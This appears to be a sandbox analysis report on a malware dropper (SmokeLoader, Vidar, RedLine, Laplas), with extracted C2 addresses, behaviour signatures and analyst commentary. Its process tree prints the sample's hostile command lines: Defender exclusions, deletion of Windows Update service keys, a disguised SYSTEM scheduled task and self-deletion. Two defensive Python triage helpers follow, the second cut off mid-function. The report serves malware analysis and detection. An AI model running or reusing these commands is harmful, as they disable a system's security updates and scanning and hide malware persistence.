Analysis
max time kernel: 92s
max time network: 135s
platform: windows10-2004_x64
resource: win10v2004-20230221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/04/2023, 00:51
Static task: static1
Behavioral task: behavioral1 (sample setup.exe, resource win7-20230220-en)
Behavioral task: behavioral2 (sample setup.exe, resource win10v2004-20230221-en)
The signatures, process tree and dropped files below are from behavioral2, the Windows 10 run: the platform field says so, and the YARA resource paths are prefixed behavioral2/.
General
Target: setup.exe
Size: 213KB
MD5: 22a06350369a20eabe5a60f29b10409e
SHA1: fd12766bc8caf43cd0318933eb9cdd34e8d86bef
SHA256: 96b92223396da25f949fa4f8f39057db933c3567886f57aa40e6cda3a3d48d96
SHA512: 8a43318243d6b466193b07996de24cac596bb72740a56937df8e5398bebf11a58e012affa557f31f4dfefa4319938f9e9c70d4be511db992ddd5e64872024be7
SSDEEP: 3072:aP24+4p4p77GD5qwrQzVKAJ7TDVeSGTUkbCVZ0NXO7WbYbsh5NvJ:4L+4peGDQLzUG7TJNGTUhqOpAxv
Malware Config
Extracted: smokeloader
  Botnet: sprg
Extracted: smokeloader
  Version: 2022
  C2:
    http://hoh0aeghwugh2gie.com/
    http://hie7doodohpae4na.com/
    http://aek0aicifaloh1yo.com/
    http://yic0oosaeiy7ahng.com/
    http://wa5zu7sekai8xeih.com/
Extracted: vidar
  Version: 3.4
  Botnet: e749025c61b2caca10aa829a9e1a65a1
  C2:
    https://steamcommunity.com/profiles/76561199494593681
    https://t.me/auftriebs
  Attributes:
    profile_id_v2: e749025c61b2caca10aa829a9e1a65a1
    user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
  (The Steam profile and Telegram channel are dead-drop resolvers: Vidar fetches the real C2 address from the profile text, so blocking these two URLs does not by itself stop the stealer. The Linux/Firefox user agent on a Windows host is a usable network detection hint.)
Extracted: redline
  Botnet: build03
  C2: 65.21.3.192:32845
  Attributes:
    auth_value: 688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted: laplas
  C2: http://185.106.92.74
  Attributes:
    api_key: bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
These are the subkeys removed by the reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f command in the process tree; once the key is gone the Service Control Manager has no definition of the Windows Update service to load at the next boot. The same batch stops and deletes UsoSvc, WaaSMedicSvc, bits and dosvc as well (see the sc.exe and reg.exe children of the two cmd.exe instances in the tree), so recovery means restoring all five service keys, not only wuauserv.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 2772 created 3204 | 2772 | Tzairumea840.exe | 23 (the same row is recorded four times)
The caller is Tzairumea840.exe (PID 2772) and the other process named is Explorer.EXE (PID 3204), which already existed when the call was made, so this records a process being created with a parent other than the caller (parent-PID spoofing). Of the entries that appear at the top level of the process tree without a recorded parent, C:\Program Files\Google\Chrome\updater.exe (PID 4532) is the one to check first.
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | Tzairumea840.exe
drivers\etc\hosts is the system hosts file, not a driver; the report records only that it was written, so diff the recovered file against a known-good copy for names pointed at 127.0.0.1 or 0.0.0.0.
Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | 85906762675035264924.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | D595.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C0B5.exe
Executes dropped EXE 7 IoCs
pid | Process
4232 | C0B5.exe
4332 | D595.exe
4536 | 17433733360249395485.exe
1352 | 85906762675035264924.exe
2760 | svcservice.exe
2772 | Tzairumea840.exe
3836 | D595.exe
Loads dropped DLL 2 IoCs
pid | Process
4232 | C0B5.exe
4232 | C0B5.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
YARA matches (rule: upx)
resource | yara_rule
behavioral2/files/0x000600000002317c-286.dat | upx
behavioral2/files/0x000600000002317c-288.dat | upx
behavioral2/files/0x000600000002317c-289.dat | upx
behavioral2/memory/4536-292-0x0000000000DB0000-0x0000000001C13000-memory.dmp | upx
behavioral2/memory/4536-295-0x0000000000DB0000-0x0000000001C13000-memory.dmp | upx
PID 4536 is 17433733360249395485.exe (see Executes dropped EXE), so the UPX-packed stage is that dropped file; the memory dumps of it are the place to look for the unpacked image.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" | 85906762675035264924.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" | D595.exe
Both are per-user (HKCU) Run keys. svcservice.exe is visible in the process tree; no process named Xrdsu.exe runs during the capture, so the second entry is persistence for a later boot and the file under Roaming\Ygpxl has to be collected from disk.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid | Process
1352 | 85906762675035264924.exe
1352 | 85906762675035264924.exe
2760 | svcservice.exe
2760 | svcservice.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 4332 set thread context of 3836 | 4332 | D595.exe | 115
Together with the WriteProcessMemory rows from 4332 to 3836 below, this is the sequence of writing a payload into a second, suspended copy of the same executable and redirecting its entry point (process hollowing); the second D595.exe (PID 3836) is the one that later holds SeDebugPrivilege.
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4472 | sc.exe
2224 | sc.exe
620 | sc.exe
3972 | sc.exe
336 | sc.exe
2084 | sc.exe
4732 | sc.exe
4284 | sc.exe
3272 | sc.exe
1164 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(Generic signature text. Nothing else in this report, no file encryption, no ransom note, points at ransomware; in a loader/stealer/miner chain like this one, drive enumeration is more plausibly host inventory or a sandbox check.)
Program crash 1 IoCs
pid | pid_target | Process | procid_target
4656 | 4232 | WerFault.exe | 88
The crashing process (PID 4232) is C0B5.exe.
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | setup.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | setup.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | setup.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C0B5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C0B5.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
4644 | timeout.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
1188 | setup.exe (2 rows)
3204 | Explorer.EXE (all remaining rows, 64 listed in total)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
3204 | Explorer.EXE
Suspicious behavior: MapViewOfSection 19 IoCs
pid | Process
1188 | setup.exe (1 row)
3204 | Explorer.EXE (the remaining 18 rows)
The pattern across these three signatures, setup.exe mapping a section once and Explorer.EXE then doing all the process enumeration, window polling and section mapping, is consistent with the loader stage having been injected into Explorer.EXE, which is also why every later stage in the process tree is a child of PID 3204 rather than of setup.exe.
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process (consecutive identical rows collapsed; the list stops at the 64-row cap)
Token: SeDebugPrivilege | 4332 | D595.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege (pair ×2) | 3204 | Explorer.EXE
Token: SeDebugPrivilege | 3876 | powershell.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege (pair ×3) | 3204 | Explorer.EXE
Token: SeDebugPrivilege | 908 | powershell.exe
Token: SeDebugPrivilege | 3228 | powershell.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 3784 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 3372 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 216 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 3912 | powercfg.exe
Token: SeDebugPrivilege | 3836 | D595.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3228 | powershell.exe
Token: the same sequence a second time, cut off after 35 by the 64-row cap | 3228 | powershell.exe
PID 3228 is the elevated PowerShell that registers the GoogleUpdateTaskMachineQC task; enabling every privilege in the token is what that looks like from the sandbox. The bare numbers 33 to 36 are privilege LUIDs the sandbox did not resolve to names.
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (identical rows collapsed, count in parentheses)
PID 3204 wrote to memory of 4232 | 3204 | Explorer.EXE | 88 (×3)
PID 3204 wrote to memory of 4332 | 3204 | Explorer.EXE | 90 (×3)
PID 3204 wrote to memory of 4404 | 3204 | Explorer.EXE | 91 (×4)
PID 3204 wrote to memory of 724 | 3204 | Explorer.EXE | 92 (×3)
PID 3204 wrote to memory of 956 | 3204 | Explorer.EXE | 93 (×4)
PID 3204 wrote to memory of 1908 | 3204 | Explorer.EXE | 94 (×3)
PID 4332 wrote to memory of 3876 | 4332 | D595.exe | 95 (×3)
PID 3204 wrote to memory of 5072 | 3204 | Explorer.EXE | 97 (×4)
PID 3204 wrote to memory of 2092 | 3204 | Explorer.EXE | 98 (×4)
PID 3204 wrote to memory of 2336 | 3204 | Explorer.EXE | 99 (×4)
PID 4232 wrote to memory of 4536 | 4232 | C0B5.exe | 100 (×2)
PID 3204 wrote to memory of 3884 | 3204 | Explorer.EXE | 102 (×3)
PID 4536 wrote to memory of 540 | 4536 | 17433733360249395485.exe | 103 (×2)
PID 3204 wrote to memory of 1828 | 3204 | Explorer.EXE | 105 (×4)
PID 540 wrote to memory of 4624 | 540 | cmd.exe | 106 (×2)
PID 4232 wrote to memory of 1352 | 4232 | C0B5.exe | 107 (×3)
PID 4232 wrote to memory of 2020 | 4232 | C0B5.exe | 108 (×3)
PID 2020 wrote to memory of 4644 | 2020 | cmd.exe | 111 (×3)
PID 1352 wrote to memory of 2760 | 1352 | 85906762675035264924.exe | 113 (×3)
PID 4332 wrote to memory of 2772 | 4332 | D595.exe | 114 (×2)
PID 4332 wrote to memory of 3836 | 4332 | D595.exe | 115 (×2)
The target PIDs are exactly the children shown under each process in the tree below; a parent writing into a freshly created child is the normal CreateProcess path as well as the injection one, so the rows worth attention are the ones paired with SetThreadContext (4332 into 3836) rather than every Explorer.EXE row.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
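The "Drops file in Drivers directory" signature above records Tzairumea840.exe creating C:\Windows\System32\drivers\etc\hosts but not what it wrote. The following is an added example, not code from the report or from tria.ge, of the check an analyst runs on the recovered file: parse it the way the Windows resolver does (comments, tabs, several names per line, IPv6) and list every name that is not a localhost alias yet resolves to a loopback or unspecified address. The hosts content and the watch list of name fragments are constructed for illustration.

```python
"""Added example (not from the report): review a Windows hosts file for
sinkholed names. The report only records that the sample created
C:\\Windows\\System32\\drivers\\etc\\hosts; the content below is constructed."""
import ipaddress

# Constructed sample hosts file: Microsoft's stock header, the usual
# localhost lines, a few sinkholed names and one ordinary corporate override.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# 102.54.94.97     rhino.acme.com          # source server
127.0.0.1       localhost
::1             localhost
0.0.0.0 update.microsoft.com windowsupdate.microsoft.com
127.0.0.1\tdownload.windowsupdate.com
0.0.0.0   www.virustotal.com   # constructed entry
0.0.0.0   telemetry.example    # sinkholed but not on the watch list
10.0.0.5  intranet.corp.example   # ordinary corporate override, not a sinkhole
"""

# Names that legitimately map to loopback and should not be reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}

# Name fragments that deserve a second look when sinkholed (assumption:
# a starting point to tune per estate, not an authoritative list).
WATCH_FRAGMENTS = ("windowsupdate", "update.microsoft", "virustotal",
                   "defender", "avast", "kaspersky")


def parse_hosts(text):
    """Yield (ip, name, line_no) for every mapping in a hosts file.
    Comments and blank lines are skipped; a line may map several names."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()          # handles runs of spaces and tabs
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                  # not a mapping line
        for name in parts[1:]:
            yield ip, name.lower(), line_no


def sinkholed_entries(text):
    """Return [(line_no, name, ip, on_watch_list)] for names that resolve to a
    loopback or unspecified address and are not a localhost alias."""
    hits = []
    for ip, name, line_no in parse_hosts(text):
        if not (ip.is_loopback or ip.is_unspecified):
            continue
        if name in LOCAL_NAMES:
            continue
        on_watch_list = any(fragment in name for fragment in WATCH_FRAGMENTS)
        hits.append((line_no, name, str(ip), on_watch_list))
    return hits


if __name__ == "__main__":
    for line_no, name, ip, watched in sinkholed_entries(SAMPLE_HOSTS):
        flag = "WATCH" if watched else "     "
        print(f"{flag} line {line_no:>3}: {name} -> {ip}")
```

Every non-localhost name pinned to loopback is reported, with the watch list only adding emphasis; on a real host, diff the output against a clean baseline of the same image rather than relying on the fragment list alone.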
Processes
(Depth in brackets; each entry's parent is the nearest entry one level shallower above it. Where no cmdline line is shown, the recorded command line is identical to the image path.)

[1] C:\Windows\Explorer.EXE  PID:3204
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup.exe  PID:1188
      cmdline: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Local\Temp\C0B5.exe  PID:4232
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious use of WriteProcessMemory
    [3] C:\ProgramData\17433733360249395485.exe  PID:4536
        cmdline: "C:\ProgramData\17433733360249395485.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe  PID:540
          cmdline: C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\17433733360249395485.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\choice.exe  PID:4624
            cmdline: choice /C Y /N /D Y /T 0
    [3] C:\ProgramData\85906762675035264924.exe  PID:1352
        cmdline: "C:\ProgramData\85906762675035264924.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe  PID:2760
          cmdline: "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
          - Executes dropped EXE
          - Suspicious use of NtSetInformationThreadHideFromDebugger
    [3] C:\Windows\SysWOW64\cmd.exe  PID:2020
        cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C0B5.exe" & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\timeout.exe  PID:4644
          cmdline: timeout /t 6
          - Delays execution with timeout.exe
    [3] C:\Windows\SysWOW64\WerFault.exe  PID:4656
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 2116
        - Program crash
  [2] C:\Users\Admin\AppData\Local\Temp\D595.exe  PID:4332
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID:3876
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
        (the -ENC argument is base64 of UTF-16LE text and decodes to: start-sleep -seconds 20)
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe  PID:2772
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\D595.exe  PID:3836
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\explorer.exe  PID:4404
  [2] C:\Windows\explorer.exe  PID:724
  [2] C:\Windows\SysWOW64\explorer.exe  PID:956
  [2] C:\Windows\explorer.exe  PID:1908
  [2] C:\Windows\SysWOW64\explorer.exe  PID:5072
  [2] C:\Windows\SysWOW64\explorer.exe  PID:2092
  [2] C:\Windows\SysWOW64\explorer.exe  PID:2336
  [2] C:\Windows\explorer.exe  PID:3884
  [2] C:\Windows\SysWOW64\explorer.exe  PID:1828
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:908
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
      (Excludes the whole user profile and Program Files from Defender scanning; Get-MpPreference | Select ExclusionPath on a suspect host shows whether it took effect.)
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3228
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Suspicious use of AdjustPrivilegeToken
      (When elevated, registers a SYSTEM-level startup task named GoogleUpdateTaskMachineQC that runs C:\Program Files\Google\Chrome\updater.exe, using schtasks on Windows older than 6.2 and Register-ScheduledTask otherwise; when not elevated it falls back to an HKCU Run key of the same name. The name imitates Google's updater tasks, but the legitimate updater is GoogleUpdate.exe under Google\Update, not Chrome\updater.exe.)
  [2] C:\Windows\System32\cmd.exe  PID:4104
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe  PID:3784
        cmdline: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  PID:3372
        cmdline: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  PID:216
        cmdline: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  PID:3912
        cmdline: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe  PID:2740
      cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    [3] C:\Windows\System32\sc.exe  PID:2224  cmdline: sc stop UsoSvc  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:620  cmdline: sc stop WaaSMedicSvc  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:3972  cmdline: sc stop wuauserv  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:4732  cmdline: sc stop bits  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:4284  cmdline: sc stop dosvc  - Launches sc.exe
    [3] C:\Windows\System32\reg.exe  PID:4368  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe  PID:2308  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe  PID:748  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f  - Modifies security service
    [3] C:\Windows\System32\reg.exe  PID:2180  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe  PID:4156  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3800
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    [3] C:\Windows\system32\schtasks.exe  PID:3180
        cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:4728
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  [2] C:\Windows\System32\cmd.exe  PID:3520
      cmdline: same sc stop / reg delete batch as PID 2740 above
    [3] C:\Windows\System32\sc.exe  PID:336  cmdline: sc stop UsoSvc  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:3272  cmdline: sc stop WaaSMedicSvc  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:2084  cmdline: sc stop wuauserv  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:4472  cmdline: sc stop bits  - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  PID:1164  cmdline: sc stop dosvc  - Launches sc.exe
    [3] C:\Windows\System32\reg.exe  PID:4184  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe  PID:4580  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe  PID:4508  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    [3] C:\Windows\System32\reg.exe  PID:3420  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe  PID:4388  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\cmd.exe  PID:2680
      cmdline: same powercfg batch as PID 4104 above
    [3] C:\Windows\System32\powercfg.exe  PID:4584  cmdline: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe  PID:4916  cmdline: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe  PID:388  cmdline: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe  PID:4772  cmdline: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3452
      cmdline: same <#mmwusnu#> task-registration script as PID 3228 above
[1] C:\Windows\SysWOW64\WerFault.exe  PID:4120
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4232 -ip 4232
[1] C:\Program Files\Google\Chrome\updater.exe  PID:4532
    cmdline: "C:\Program Files\Google\Chrome\updater.exe"

The whole Defender-exclusion / task-registration / service-deletion / powercfg sequence runs twice from Explorer.EXE (PIDs 908, 3228, 4104, 2740, 3800 and then 4728, 3452, 2680, 3520), which fits a payload started once directly and once again through the task. Disabling standby and hibernation keeps the machine awake, which only matters to something that wants continuous CPU time.
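The command lines in the tree above (Defender exclusion, SYSTEM scheduled task, update-service stop and delete, powercfg, self-deletion, and the -ENC PowerShell) are what a triage pass over process-creation telemetry should key on. The following is an added example, not code from the report or from tria.ge: it scans a list of command lines, decodes any -EncodedCommand argument, and tags each line with the behaviours it matches. The sample lines are copied from the tree with their image paths trimmed, the notepad line is a constructed benign control, and the tag names are this example's own rather than tria.ge signature names.

```python
"""Added triage helper (not part of the tria.ge report): tag process command
lines with the defence-evasion and persistence patterns seen in the tree."""
import base64
import binascii
import re

# Services the sample stopped and deleted (from the sc/reg lines above).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# Constructed input: command lines from the process tree with their full
# image paths trimmed, plus one benign control line at the end.
SAMPLE_CMDLINES = [
    "powershell.exe -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==",
    "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    "cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    'cmd.exe /c sc stop UsoSvc & sc stop wuauserv & reg delete "HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv" /f',
    "powershell.exe Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute "
    "'C:\\Program Files\\Google\\Chrome\\updater.exe') -TaskName 'GoogleUpdateTaskMachineQC' "
    "-User 'System' -RunLevel 'Highest' -Force",
    'cmd.exe /c timeout /t 6 & del /f /q "C:\\Users\\Admin\\AppData\\Local\\Temp\\C0B5.exe" & exit',
    "cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\\ProgramData\\17433733360249395485.exe",
    "notepad.exe C:\\Users\\Admin\\Documents\\notes.txt",   # constructed benign line
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand, case-insensitively.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64
    over UTF-16LE), or None if the line carries none or it is malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
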